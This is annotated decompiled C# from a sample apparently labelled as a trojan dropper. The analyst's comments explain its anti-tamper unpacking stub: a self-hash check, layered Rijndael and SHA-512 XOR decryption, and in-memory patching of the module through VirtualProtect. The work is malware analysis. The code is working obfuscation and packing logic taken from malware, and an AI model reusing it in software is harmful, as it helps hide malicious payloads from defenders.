// Decompiled with JetBrains decompiler
// Type: 쁽䘑㬢䭎싲<E4AD8E>Ⓑ薢
// Assembly: scan, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: C0A4408A-6830-4FA8-819B-3D801C5B54D7
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Injector.epwx-6071ef40caa18e93eea0d00f252e0ef03c97d96be12ad3f375d8a38aa3517cd6.exe
using System;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
/// <summary>
/// Analyst annotation (decompiled sample, identifiers are obfuscated). This static class
/// verifies the integrity of its own module image, decrypts an embedded blob with a key
/// derived from that image, and copies the decrypted records back into the loaded module
/// after temporarily changing page protection.
/// </summary>
/// <remarks>
/// Every numeric literal carries the same arithmetic tail. Reading the decompiler's
/// <c>--10.0</c> as <c>-(-10.0)</c>, that tail folds to -23; the folded values are given in
/// the comments below. NOTE(review): the overall shape resembles an obfuscator-generated
/// anti-tamper stub; this file alone does not establish which tool produced it.
/// Triage pointers visible here: the FailFast messages "Broken file" and "Module error",
/// a P/Invoke of kernel32 VirtualProtect, and Marshal.GetHINSTANCE on the type's own module.
/// </remarks>
internal static class 쁽䘑㬢䭎싲\uFFFD\u24B7薢
{
  // P/Invoke binding to kernel32!VirtualProtect under an obfuscated managed name.
  // Parameters, in order: address, size in bytes, new protection, previous protection (out).
  [DllImport("kernel32.dll", EntryPoint = "VirtualProtect", PreserveSig = false)]
  private static extern bool 稀\uE109那\u26E8춷㘓㦹꧑(
    IntPtr _param0,
    uint _param1,
    uint _param2,
    out uint _param3);

  /// <summary>
  /// Entry routine of the stub: reads header fields from the module's own image, checks an
  /// MD5-based fingerprint, decrypts the embedded table and patches each record into memory.
  /// Any failed check ends in Environment.FailFast, which terminates the process, so the
  /// <c>goto</c> that follows each FailFast call is not expected to run.
  /// </summary>
  public static unsafe void 믎Յ퀜ᱨ䄺涱㸿ꋶ()
  {
    // Base address of the module that contains this class.
    Module module = typeof (쁽䘑㬢䭎싲\uFFFD\u24B7薢).Module;
    IntPtr hinstance = Marshal.GetHINSTANCE(module);
    // -1 means no HINSTANCE could be obtained for the module.
    if (hinstance == (IntPtr) -1)
      goto label_2;
  label_1:
    Stream input;
    bool flag;
    // "<Unknown>" is the name reported for a module that has no backing file; in that case
    // the image is read straight from memory, otherwise from the file on disk (label_5).
    if (module.FullyQualifiedName == "<Unknown>")
    {
      flag = true;
      // Length and capacity both fold to 268435455 (0x0FFFFFFF); the FileAccess value folds
      // to 3 (FileAccess.ReadWrite). The stream starts at the module base address.
      input = (Stream) new UnmanagedMemoryStream((byte*) hinstance.ToPointer(), (long) (int) (268435478.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0), (long) (int) (268435478.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0), (FileAccess) (26.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0));
    }
    else
      goto label_5;
  label_4:
    byte[] numArray1;   // leading bytes of the image; hashed and used to derive the key
    byte[] numArray2;   // encrypted blob
    ulong num1;         // expected fingerprint value
    int dstOffset;      // optional region to blank before hashing (0 = none)
    byte[] numArray3;   // passed as the IV to the decryptor
    int position;       // offset of the 4-byte header field that is blanked before hashing
    int count1;         // length of the optional blanked region
    using (BinaryReader binaryReader = new BinaryReader(input))
    {
      // Offset folds to 60 (0x3C), where a PE image stores e_lfanew (offset of the NT headers).
      input.Seek((long) (int) (83.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0), SeekOrigin.Begin);
      uint offset1 = binaryReader.ReadUInt32();
      input.Seek((long) offset1, SeekOrigin.Begin);
      // Skip folds to 6 bytes; the 16-bit value read next (num2) is not used afterwards.
      input.Seek((long) (int) (29.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0), SeekOrigin.Current);
      int num2 = (int) binaryReader.ReadUInt16();
      Stream stream = input;
      int num3 = (int) offset1;
      // Folds to 24: offset1 + 24 is where the optional header starts in a PE image.
      int num4 = (int) (47.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0);
      uint num5;
      long offset2 = (long) (num5 = (uint) (num3 + num4));
      stream.Seek(offset2, SeekOrigin.Begin);
      // 16-bit value at the start of the optional header; num6 is not used afterwards.
      int num6 = (int) binaryReader.ReadUInt16();
      // Skip folds to 62, so the stream now sits 64 bytes into the optional header.
      // NOTE(review): that is where a PE optional header keeps CheckSum - confirm on the sample.
      input.Seek((long) (int) (85.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0), SeekOrigin.Current);
      position = (int) input.Position;
      // The 32-bit field is XOR-decoded (constant folds to -1945389431) into a byte count.
      int count2 = binaryReader.ReadInt32() ^ (int) (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0))) - 1945389408.0 - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0);
      // A decoded value equal to the XOR constant means the stored field was zero.
      if (count2 == (int) (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0))) - 1945389408.0 - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0))
        goto label_8;
    label_7:
      // Read the first count2 bytes of the image, then the trailer stored right after them:
      // fingerprint (XOR-decoded), blank-region offset and length, IV bytes, encrypted blob.
      input.Seek(0L, SeekOrigin.Begin);
      numArray1 = binaryReader.ReadBytes(count2);
      num1 = binaryReader.ReadUInt64() ^ 8675158181231138756UL;
      dstOffset = binaryReader.ReadInt32();
      count1 = binaryReader.ReadInt32();
      // Length prefix is XOR-decoded; the constant folds to -74420194.
      numArray3 = binaryReader.ReadBytes(binaryReader.ReadInt32() ^ (int) (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0))) - 74420171.0 - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0));
      // Length prefix is XOR-decoded; the constant folds to 1200252995.
      numArray2 = binaryReader.ReadBytes(binaryReader.ReadInt32() ^ (int) (1200253018.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0));
      goto label_12;
    label_8:
      Environment.FailFast("Broken file");
      goto label_7;
    }
  label_12:
    // Blank the 4-byte header field (length folds to 4) in the in-memory copy so the
    // fingerprint is computed over the image as it was before that field was filled in.
    Buffer.BlockCopy((Array) new byte[(int) (27.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0)], 0, (Array) numArray1, position, (int) (27.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0));
    if (dstOffset != 0)
      goto label_16;
  label_15:
    // Fingerprint check: MD5 over the prepared copy, first 8 digest bytes XOR the next 8
    // (offset folds to 8), compared with the stored value. A mismatch aborts the process.
    byte[] hash = MD5.Create().ComputeHash(numArray1);
    if ((long) (BitConverter.ToUInt64(hash, 0) ^ BitConverter.ToUInt64(hash, (int) (31.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0))) != (long) num1)
      goto label_18;
  label_14:
    // Decrypt the blob; the key material is the image copy itself, so a modified image
    // yields a different key. The copy is then overwritten with zeros.
    byte[] src = 쁽䘑㬢䭎싲\uFFFD\u24B7薢.\uE48C鬄უ\u319F\u2A31\u2F8B\uF3C3\u2EE7(numArray1, numArray3, numArray2);
    Buffer.BlockCopy((Array) new byte[numArray1.Length], 0, (Array) numArray1, 0, numArray1.Length);
    // The plaintext must start with the two marker bytes 214 (0xD6) and 111 (0x6F).
    if ((int) src[0] != (int) (237.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0) || (int) src[1] != (int) (134.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0))
      goto label_17;
  label_13:
    // Drop the 2-byte marker (both constants fold to 2); the remainder is the record table.
    byte[] numArray4 = new byte[src.Length - (int) (25.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0)];
    Buffer.BlockCopy((Array) src, (int) (25.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0), (Array) numArray4, 0, numArray4.Length);
    using (BinaryReader binaryReader = new BinaryReader((Stream) new MemoryStream(numArray4)))
    {
      // Table layout as read here: record count, then per record a first offset; when that
      // offset is non-zero it is followed by a second offset, a byte length and the bytes.
      uint length = binaryReader.ReadUInt32();
      // numArray5 / numArray6 record each patch's length and address; they are filled
      // below but not read again in this method.
      int[] numArray5 = new int[(IntPtr) length];
      IntPtr[] numArray6 = new IntPtr[(IntPtr) length];
      for (int index = 0; (long) index < (long) length; ++index)
      {
        // Both offsets are XOR-decoded with a constant that folds to 490849772.
        uint num7 = binaryReader.ReadUInt32() ^ (uint) (int) (490849795.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0);
        if (num7 != 0U)
        {
          uint num8 = binaryReader.ReadUInt32() ^ (uint) (int) (490849795.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0);
          byte[] source = binaryReader.ReadBytes(binaryReader.ReadInt32());
          // Target = module base + num7 when the module had no backing file, else + num8.
          // The base is truncated to 32 bits by the (int) cast before the addition.
          IntPtr destination = (IntPtr) (long) (uint) ((int) hinstance + (flag ? (int) num7 : (int) num8));
          uint num9;
          // Protection value folds to 4 (PAGE_READWRITE); previous protection lands in num9.
          쁽䘑㬢䭎싲\uFFFD\u24B7薢.稀\uE109那\u26E8춷㘓㦹꧑(destination, (uint) source.Length, (uint) (int) (27.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0), out num9);
          // Overwrite the bytes inside the loaded module with the decrypted record.
          Marshal.Copy(source, 0, destination, source.Length);
          // Put back the protection that was in place before the write.
          쁽䘑㬢䭎싲\uFFFD\u24B7薢.稀\uE109那\u26E8춷㘓㦹꧑(destination, (uint) source.Length, num9, out num9);
          numArray5[index] = source.Length;
          numArray6[index] = destination;
        }
      }
      return;
    }
  label_17:
    // Marker bytes did not match after decryption.
    Environment.FailFast("Broken file");
    goto label_13;
  label_18:
    // Fingerprint mismatch.
    Environment.FailFast("Broken file");
    goto label_14;
  label_16:
    // Blank count1 bytes at dstOffset in the copy before hashing.
    // NOTE(review): what this region holds cannot be told from this file.
    Buffer.BlockCopy((Array) new byte[count1], 0, (Array) numArray1, dstOffset, count1);
    goto label_15;
  label_5:
    // File-backed module: open it read-only; the FileMode value folds to 3 (FileMode.Open).
    flag = false;
    input = (Stream) new FileStream(module.FullyQualifiedName, (FileMode) (26.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0), FileAccess.Read, FileShare.Read);
    goto label_4;
  label_2:
    Environment.FailFast("Module error");
    goto label_1;
  }

  /// <summary>
  /// Two-layer decoder for the embedded blob: a Rijndael decryption followed by a chained
  /// XOR mask derived from SHA-512.
  /// </summary>
  /// <param name="_param0">Bytes hashed to obtain the key (SHA-256) and the first mask (SHA-512).</param>
  /// <param name="_param1">Passed as the IV to the decryptor.</param>
  /// <param name="_param2">Encrypted bytes.</param>
  /// <returns>A buffer of the same length as <paramref name="_param2"/> holding the decoded bytes.</returns>
  private static byte[] \uE48C鬄უ\u319F\u2A31\u2F8B\uF3C3\u2EE7(
    byte[] _param0,
    byte[] _param1,
    byte[] _param2)
  {
    // Rijndael.Create() is used with the library's default mode and padding.
    Rijndael rijndael = Rijndael.Create();
    byte[] buffer = new byte[_param2.Length];
    // Layer 1: decrypt into buffer with a single Read call.
    using (CryptoStream cryptoStream = new CryptoStream((Stream) new MemoryStream(_param2), rijndael.CreateDecryptor(SHA256.Create().ComputeHash(_param0), _param1), CryptoStreamMode.Read))
      cryptoStream.Read(buffer, 0, _param2.Length);
    SHA512 shA512 = SHA512.Create();
    byte[] hash = shA512.ComputeHash(_param0);
    // Layer 2: walk the buffer in 64-byte blocks (the step folds to 64).
    for (int offset = 0; offset < buffer.Length; offset += (int) (87.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0))
    {
      // num = end of the current block, clamped to the buffer length.
      int num = buffer.Length <= offset + (int) (87.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0) ? buffer.Length : offset + (int) (87.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0);
      // Each byte is XORed with the matching mask byte XOR a constant that folds to 132 (0x84).
      for (int index = offset; index < num; ++index)
        buffer[index] ^= (byte) ((int) hash[index - offset] ^ (int) (155.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0));
      // The next block's mask is the SHA-512 of the block just decoded.
      hash = shA512.ComputeHash(buffer, offset, num - offset);
    }
    return buffer;
  }
}